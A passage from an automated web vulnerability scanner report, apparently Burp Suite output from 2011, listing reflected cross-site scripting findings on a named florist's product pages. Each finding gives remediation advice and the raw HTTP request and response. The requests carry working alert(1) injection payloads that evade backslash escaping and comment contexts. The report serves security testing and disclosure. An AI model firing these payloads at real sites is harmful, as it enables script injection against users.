Cookie: uat=1_1304506950; cmp=1_1304695062_13981:0_13479:0_15758:159333_12704:159333_4895:587518_10164:951794_10638:951794_10640:951794_10641:951794_1437:951794_1660:1515390; uid=1_1304695062_1303179323923:6792170478871670; kwd=1_1304695062_12936:0_11317:951794_11717:951794_11718:951794_11719:951794; sit=1_1304695062_3455:0:0_2988:222280:188109_3801:334723:334303_1714:619256:587518_3306:846882:159333_719:952621:951794_2451:1003490:998390_3236:1161453:1161335_782:1515739:1515390; cre=1_1304695062_29802:59536:1:334091_29805:59534:1:334752; bpd=1_1304695062_1ZCU5:3YJ3; apd=1_1304695062; scg=1_1304695062; ppd=1_1304695062; afl=1_1304695062

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:56 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304902976_13981:207914_13479:207914_15758:367247_12704:367247_4895:795432_10164:1159708_10638:1159708_10640:1159708_10641:1159708_1437:1159708_1660:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: uid=1_1304902976_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: kwd=1_1304902976_12936:207914_11317:1159708_11717:1159708_11718:1159708_11719:1159708; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: sit=1_1304902976_3455:207914:207914_2988:430194:396023_3801:542637:542217_1714:827170:795432_3306:1054796:367247_719:1160535:1159708_2451:1211404:1206304_3236:1369367:1369249_782:1723653:1723304; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: cre=1_1304902976_29802:59536:1:542005_29805:59534:1:542666; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: bpd=1_1304902976_1ZCU5:4QOV; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: apd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: scg=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: ppd=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Set-Cookie: afl=1_1304902976; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:02:56 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:02:56 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing2ccab<x style=x:expression(alert(1))>059125350e6' *not* found -->

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141b9\"%3balert(1)//08331235fa2 was submitted in the Ref parameter. This input was echoed as 141b9\\";alert(1)//08331235fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef141b9\"%3balert(1)//08331235fa2 HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:39 GMT
Content-Length: 150181


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050137","30050137","30050137","428685","27","HomeNoRef141b9\\";alert(1)//08331235fa2","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e13\"%3balert(1)//07e77d7addd was submitted in the tile parameter. This input was echoed as c3e13\\";alert(1)//07e77d7addd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carouselc3e13\"%3balert(1)//07e77d7addd&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:07 GMT
Content-Length: 148302


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
tpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_carouselc3e13\\";alert(1)//07e77d7addd" != "")
           {
               s.eVar20="PFC_hmpg_carouselc3e13\\";alert(1)//07e77d7addd_";
           }
           s.eVar37=cleanString("PFC:Product:30050137_Deluxe Mother...s Day Bouquet");
           s.eVar51="HPC";
           s.events =
...[SNIP]...

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2010f\"%3balert(1)//114dc093c72 was submitted in the trackingpgroup parameter. This input was echoed as 2010f\\";alert(1)//114dc093c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC2010f\"%3balert(1)//114dc093c72&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:11:28 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:11:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:11:28 GMT
Content-Length: 143627


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
");
           s.prop1 = cleanString("PFC:Product:30050137-DeluxeMother...sDayBouquet");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           else if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCart" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           
...[SNIP]...

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f678a\"%3balert(1)//17f597f93ba was submitted in the Ref parameter. This input was echoed as f678a\\";alert(1)//17f597f93ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoReff678a\"%3balert(1)//17f597f93ba HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:36:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:36:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:25 GMT
Content-Length: 143975


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30008396","30008396","30008396","293461","27","HomeNoReff678a\\";alert(1)//17f597f93ba","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the tile request parameter is copied into a JavaScript rest-of-line comment. The payload 702ee%0aalert(1)//1c7004ec03a was submitted in the tile parameter. This input was echoed as 702ee
alert(1)//1c7004ec03a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373702ee%0aalert(1)//1c7004ec03a&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:34:18 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:34:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:18 GMT
Content-Length: 142585


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
pod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a
" != "")
           {
               s.eVar20="PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373702ee
alert(1)//1c7004ec03a_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS
...[SNIP]...

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38208\"%3balert(1)//9789dc0b2fb was submitted in the trackingpgroup parameter. This input was echoed as 38208\\";alert(1)//9789dc0b2fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS38208\"%3balert(1)//9789dc0b2fb&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
